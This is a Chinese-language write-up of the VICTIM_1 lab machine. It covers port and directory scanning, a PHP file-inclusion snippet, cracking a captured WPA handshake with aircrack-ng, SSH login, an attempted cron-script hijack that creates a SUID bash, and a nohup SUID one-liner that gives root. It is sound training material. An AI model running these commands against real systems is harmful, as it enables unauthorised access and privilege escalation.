VICTIM_1 靶机

信息收集

┌──(kali㉿kali)-[~/Downloads/VICTIM_1]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.120
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-27 07:48 EDT
Nmap scan report for 192.168.56.120
Host is up (0.00036s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy
8999/tcp open  bctp
9000/tcp open  cslistener
MAC Address: 08:00:27:CE:FC:4B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.42 seconds

开放了22,80,8080,8999,9000 端口

┌──(kali㉿kali)-[~/Downloads/VICTIM_1]
└─$ sudo nmap -sT -sV -sC -O -p22,80,8080,8999,9000 192.168.56.120    
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-27 07:49 EDT
Nmap scan report for 192.168.56.120
Host is up (0.00033s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ea:e8:15:7d:8a:74:bc:45:09:76:34:13:2c:d8:1e:62 (RSA)
|   256 51:75:37:23:b6:0f:7d:ed:61:a0:61:18:21:89:35:5d (ECDSA)
|_  256 7d:36:08:ba:91:ef:24:9f:7b:24:f6:64:c7:53:2c:b0 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.29 (Ubuntu)
8080/tcp open  http    BusyBox httpd 1.13
|_http-title: 404 Not Found
8999/tcp open  http    WebFS httpd 1.21
|_http-server-header: webfs/1.21
|_http-title: 0.0.0.0:8999/
9000/tcp open  http    PHP cli server 5.5 or later (PHP 7.2.30-1)
|_http-title: Uncaught Exception: MissingDatabaseExtensionException
MAC Address: 08:00:27:CE:FC:4B (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (93%), Synology DiskStation Manager 5.X (87%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/a:synology:diskstation_manager:5.2
Aggressive OS guesses: Linux 4.15 - 5.8 (93%), Linux 5.0 - 5.4 (93%), Linux 5.0 - 5.5 (90%), Linux 2.6.32 (87%), Linux 3.10 - 4.11 (87%), Linux 3.2 - 4.9 (87%), Linux 3.4 - 3.10 (87%), Synology DiskStation Manager 5.2-5644 (87%), Linux 2.6.32 - 3.10 (86%), Linux 2.6.32 - 3.13 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.68 seconds

Ubuntu 操作系统，80 端口 403 没有权限，8080 端口 404 没找到资源，8999 WebFS，9000 PHP cli server

┌──(kali㉿kali)-[~/Downloads/VICTIM_1]
└─$ sudo nmap --script=vuln -p22,80,8080,8999,9000 192.168.56.120            
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-27 08:01 EDT
Nmap scan report for 192.168.56.120
Host is up (0.00033s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
8080/tcp open  http-proxy
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server\'s resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
8999/tcp open  bctp
9000/tcp open  cslistener
MAC Address: 08:00:27:CE:FC:4B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 94.78 seconds

漏洞脚本扫描没什么结果。依次查看各个端口的界面

Web 服务查看

80 端口提示No configuration file found and no installation code available. Exiting...

8080 端口提示 404

8999 端口列出来一些文件，看起来是 wordpress，但是没有 wp-config.php

9000 端口提示数据库连接缺少driver

这时候没什么线索，我先把 8999 端口中的文件夹和文件大致浏览了一遍，没有发现可利用的地方，不过有个 WPA-01.cap 文件，下载后打开是个流量包

不知道怎么处理，没看到敏感信息，那接下来进行目录爆破吧，看看是否能得到一些敏感文件或目录

目录爆破

先从 80 端口开始爆破，大部分都是 403，所以不再一一列出

┌──(kali㉿kali)-[~/Downloads/VICTIM_1]
└─$ sudo dirsearch -u http://192.168.56.120                      

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                    
 (_||| _) (/_(_|| (_| )                                                                                             
                                                                                                                    
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.56.120/_23-06-27_08-04-12.txt

Error Log: /root/.dirsearch/logs/errors-23-06-27_08-04-12.log

Target: http://192.168.56.120/

[08:04:16] 200 -   18KB - /LICENSE.txt 
[08:04:16] 200 -    5KB - /README.txt
[08:04:21] 301 -  324B  - /administrator  ->  http://192.168.56.120/administrator/
[08:04:21] 200 -   31B  - /administrator/cache/
[08:04:21] 200 -   74B  - /administrator/index.php
[08:04:21] 200 -   31B  - /administrator/logs/
[08:04:23] 200 -   31B  - /bin/
[08:04:23] 200 -   31B  - /cache/
[08:04:24] 200 -   31B  - /cli/
[08:04:24] 200 -   31B  - /components/
[08:04:28] 200 -    0B  - /file.php
[08:04:29] 200 -    3KB - /htaccess.txt
[08:04:29] 200 -   31B  - /images/ 
[08:04:30] 200 -   31B  - /includes/
[08:04:30] 200 -   74B  - /index.php 
[08:04:30] 200 -   74B  - /index.php/login/
[08:04:31] 200 -   31B  - /layouts/
[08:04:31] 200 -   31B  - /libraries/
[08:04:33] 200 -   31B  - /media/
[08:04:33] 200 -   31B  - /modules/
[08:04:36] 200 -   31B  - /plugins/
[08:04:38] 200 -   33B  - /robots.txt
[08:04:38] 200 -  829B  - /robots.txt.dist
[08:04:41] 301 -  320B  - /templates  ->  http://192.168.56.120/templates/ 
[08:04:41] 200 -   31B  - /templates/index.html                            
[08:04:41] 200 -   31B  - /templates/
[08:04:41] 200 -    0B  - /templates/beez3/
[08:04:41] 200 -    0B  - /templates/system/                               
[08:04:41] 200 -    0B  - /templates/protostar/
[08:04:42] 200 -   31B  - /tmp/ 

size 为 31B 的都是回显为空的，为 0B 的是无回显的，htaccess.txt 和 README.txt 表明这原本是个 joomla-cms，robots.txt 里是被嘲讽的信息 Disallow: h@ck3rz!，尝试了一下确实不是目录，robots.txt.dist 是 joomla 的默认 disallow 目录。80 端口到现在为止没什么收获。扫描下 8080 端口

┌──(kali㉿kali)-[~/Downloads/VICTIM_1]
└─$ sudo dirsearch -u http://192.168.56.120:8080

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                    
 (_||| _) (/_(_|| (_| )                                                                                             
                                                                                                                    
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.56.120-8080/_23-06-27_08-17-47.txt

Error Log: /root/.dirsearch/logs/errors-23-06-27_08-17-47.log

Target: http://192.168.56.120:8080/

[08:17:47] Starting: 
[08:17:48] 200 -    0B  - /.bash_history                                   
[08:17:48] 200 -  220B  - /.bash_logout                                    
[08:17:48] 200 -    4KB - /.bashrc                                         
[08:17:49] 302 -    0B  - /.local  ->  /.local/                            
[08:17:49] 200 -  807B  - /.profile                                        
[08:17:50] 200 -   66B  - /.selected_editor                                
[08:17:50] 200 -  765B  - /.viminfo                                         
[08:18:01] 403 -   93B  - /cgi-bin/                                         
[08:18:05] 200 -   63B  - /file.php                                         
[08:18:07] 403 -   93B  - /httpd.conf                                       
[08:18:12] 200 -   23B  - /passwords.txt                                   
Task Completed

这次感觉比较有东西，但是打开后发现 viminfo 文件中只有对网络操作的记录 /etc/sysconfig/network，file.php 进入直接下载下来了

<?php
$file = $_GET['file'];
include('directory/' . $file);
?>

感觉可能存在文件包含。passwords.txt 里又是被嘲讽的句子

Hahahaha...Try Harder!

到这里 8080 端口已有的信息已经处理完了，看看 9000 端口

┌──(kali㉿kali)-[~/Downloads/VICTIM_1]
└─$ sudo dirsearch -u http://192.168.56.120:9000/
[sudo] password for kali: 

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.56.120-9000/-_23-06-27_08-32-26.txt

Error Log: /root/.dirsearch/logs/errors-23-06-27_08-32-26.log

Target: http://192.168.56.120:9000/

[08:32:26] Starting:
[08:33:39] 200 -    4B  - /files/
[08:33:39] 200 -    4B  - /files
[08:33:39] 200 -    4B  - /files/tmp/
[08:33:39] 200 -    4B  - /files/cache/ 
[08:33:47] 200 -    0B  - /index.php
[08:35:25] 200 -  195B  - /files/.htaccess                                 
[08:35:25] 200 -  195B  - /files/.htaccess/

files 目录只有简单的一句 no，.htaccess 文件里也没什么东西

感觉现在比较可以作为突破点的是 file.php 文件内容中展现出的文件包含漏洞，尝试在各个端口构造文件包含漏洞的利用

但是 403 ……快山穷水尽了

aircrack-ng 爆破

不过还有个文件 WPA-1.cap 刚才一直不知道怎么处理，搜一搜吧，刚开始尝试搜 cap penetration，没什么有价值的信息，后续加上了文件名中的 wpa 搜索结果如下

第一个链接点进去。我们只想对 cap 文件进行处理，页面搜索 .cap

-b <bssid> : target selection: access point's MAC

-b 参数是用来指定接入点的 MAC，这里我们先尝试不添加这个参数直接开始运行

┌──(kali㉿kali)-[~/Downloads]
└─$ aircrack-ng -w /usr/share/wordlists/rockyou.txt WPA-01.cap 
Reading packets, please wait...
Opening WPA-01.cap
Resetting EAPOL Handshake decoder state.
Read 1918 packets.

   #  BSSID              ESSID                     Encryption

   1  5C:D9:98:5A:B6:62  dlink                     WPA (1 handshake)

Choosing first network as target.

Reading packets, please wait...
Opening WPA-01.cap
Resetting EAPOL Handshake decoder state.
Read 1918 packets.

1 potential targets


                               Aircrack-ng 1.7 

      [00:00:14] 70447/14344392 keys tested (4872.59 k/s) 

      Time left: 48 minutes, 49 seconds                          0.49%

                           KEY FOUND! [ p4ssword ]


      Master Key     : 8F C0 1B 1B 85 06 0B 85 23 7C 83 74 F8 4B 4A FD 
                       50 CE EC 72 6F 85 17 5F B1 14 5E D2 F2 47 5D 1A 

      Transient Key  : 13 41 36 81 4A 92 19 CF EC 14 B8 FD 20 2C D4 2E 
                       BA A1 95 79 CE 15 5F 1A 2C DE 03 A8 2B 52 68 64 
                       D3 77 A7 E4 FF CD 49 0C ED E9 5E 3B 68 E6 83 26 
                       06 0C 98 8D 43 B6 7C E4 FE ED 2E 45 90 0D 6D 15 

      EAPOL HMAC     : 33 A5 CE E2 46 DB 4B 96 86 A1 6E D9 D2 A2 A6 E9 

Getshell

找到了密码 p4ssword，但是有个问题，不知道用户名……，从网站里又翻找了半天，还是没找到，最后看了眼 WP，原来 dlink 就是用户名。。

┌──(kali㉿kali)-[~/Downloads]
└─$ ssh dlink@192.168.56.120  
The authenticity of host '192.168.56.120 (192.168.56.120)' can\'t be established.
ED25519 key fingerprint is SHA256:ePua4qlxyyVdR3vIDdxTLN/vcsunu7mAZICrDcLW8m0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.120' (ED25519) to the list of known hosts.
dlink@192.168.56.120\'s password: 
Last login: Tue Apr  7 23:36:49 2020 from 192.168.86.99
dlink@victim01:~$ whoami
dlink
dlink@victim01:~$ ls -liah
total 20K
152513 drwxr-xr-x 2 dlink dlink 4.0K Apr 22  2020 .
131074 drwxr-xr-x 4 root  root  4.0K Apr  7  2020 ..
153736 lrwxrwxrwx 1 dlink dlink    9 Apr  7  2020 .bash_history -> /dev/null
153733 -rw-r--r-- 1 dlink dlink  220 Apr  7  2020 .bash_logout
152516 -rw-r--r-- 1 dlink dlink 3.7K Apr  7  2020 .bashrc
153734 -rw-r--r-- 1 dlink dlink  807 Apr  7  2020 .profile
dlink@victim01:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:ce:fc:4b brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.120/24 brd 192.168.56.255 scope global dynamic enp0s3
       valid_lft 528sec preferred_lft 528sec
    inet6 fe80::a00:27ff:fece:fc4b/64 scope link 
       valid_lft forever preferred_lft forever
dlink@victim01:~$ uname -a
Linux victim01 4.15.0-96-generic #97-Ubuntu SMP Wed Apr 1 03:25:46 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
dlink@victim01:~$ sudo -l
User dlink may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/TryHarder!
dlink@victim01:~$ ls -liah /usr/bin/TryHarder!
ls: cannot access '/usr/bin/TryHarder!': No such file or directory

sudo -l 的结果中又被戏耍了，看一看 bin 目录的权限，无法写个同名的文件进去。

提权

定时任务

看看别的吧，定时任务呢

dlink@victim01:/usr/bin$ cat /etc/crontab
* * * * * /tmp/script.sh

调用了一个 sh 文件，tmp 目录又空空如也且可控，我们写个 script.sh 进去

dlink@victim01:/tmp$ echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash" > script.sh

等了半天也没被运行……搜了一下，感觉可能是脚本中没有环境变量的问题：Linux 定时任务没有执行_linux定时任务没有执行_hyfstyle的博客-CSDN博客

出现的一个疑问

看看 s 权限

dlink@victim01:/tmp$ find / -type f -perm -04000 -ls 2>/dev/null
    11165    376 -rwsr-xr--   1 root     dip        382696 Feb 11  2020 /usr/sbin/pppd
      676     24 -rwsr-xr-x   1 root     root        22520 Mar 27  2019 /usr/bin/pkexec
     1173     40 -rwsr-xr-x   1 root     root        37136 Mar 22  2019 /usr/bin/newuidmap
     2278     76 -rwsr-xr-x   1 root     root        76496 Mar 22  2019 /usr/bin/chfn
     1172     40 -rwsr-xr-x   1 root     root        37136 Mar 22  2019 /usr/bin/newgidmap
      469     40 -rwsr-xr-x   1 root     root        40344 Mar 22  2019 /usr/bin/newgrp
     2226    148 -rwsr-xr-x   1 root     root       149080 Jan 31  2020 /usr/bin/sudo
      950     36 -rwsr-xr-x   1 root     root        35000 Jan 18  2018 /usr/bin/nohup
     2279     44 -rwsr-xr-x   1 root     root        44528 Mar 22  2019 /usr/bin/chsh
     2471     20 -rwsr-xr-x   1 root     root        18448 Jun 28  2019 /usr/bin/traceroute6.iputils
      690     52 -rwsr-sr-x   1 daemon   daemon      51464 Feb 20  2018 /usr/bin/at
     2282     60 -rwsr-xr-x   1 root     root        59640 Mar 22  2019 /usr/bin/passwd
     2281     76 -rwsr-xr-x   1 root     root        75824 Mar 22  2019 /usr/bin/gpasswd
    10977     24 -rwsr-xr-x   1 root     root        22528 Jun 28  2019 /usr/bin/arping
    11027    428 -rwsr-xr-x   1 root     root       436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
     6886     44 -rwsr-xr--   1 root     messagebus    42992 Jun 10  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
      702     16 -rwsr-xr-x   1 root     root          14328 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
     7602    100 -rwsr-xr-x   1 root     root         100760 Nov 23  2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
     1316     12 -rwsr-xr-x   1 root     root          10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
      512    108 -rwsr-sr-x   1 root     root         109432 Oct 30  2019 /usr/lib/snapd/snap-confine
   393274     44 -rwsr-xr-x   1 root     root          43088 Mar  5  2020 /bin/mount
   393281     44 -rwsr-xr-x   1 root     root          44664 Mar 22  2019 /bin/su
   393282     28 -rwsr-xr-x   1 root     root          26696 Mar  5  2020 /bin/umount
   393601     64 -rwsr-xr-x   1 root     root          64424 Jun 28  2019 /bin/ping
   393285     32 -rwsr-xr-x   1 root     root          30800 Aug 11  2016 /bin/fusermount

先尝试 helper 提权

dlink@victim01:/tmp$ systemd-run -t bash
Failed to start transient service unit: Interactive authentication required.

nohup suid 提权

借助于 gtfobins

dlink@victim01:/tmp$ /usr/bin/nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
/usr/bin/nohup: ignoring input and appending output to 'nohup.out'
# whoami
root
# id
uid=1002(dlink) gid=1004(dlink) euid=0(root) groups=1004(dlink)
# cd /root
# ls
flag.txt  snap
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:ce:fc:4b brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.120/24 brd 192.168.56.255 scope global dynamic enp0s3
       valid_lft 599sec preferred_lft 599sec
    inet6 fe80::a00:27ff:fece:fc4b/64 scope link 
       valid_lft forever preferred_lft forever
# uname -a
Linux victim01 4.15.0-96-generic #97-Ubuntu SMP Wed Apr 1 03:25:46 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
# cat flag.txt
Nice work!

                .:##:::.
              .:::::/;;\:.
        ()::::::@::/;;#;|:.
        ::::##::::|;;##;|::
         ':::::::::\;;;/::'
              ':::::::::::
               |O|O|O|O|O|O
               :#:::::::##::.
              .:###:::::#:::::.
              :::##:::::::::::#:.
               ::::;:::::::::###::.
               ':::;::###::;::#:::::
                ::::;::#::;::::::::::
                :##:;::::::;::::###:::     .
              .:::::; .:::##::::::::::::::::
              ::::::; :::::::::::::::::##::  #rootdance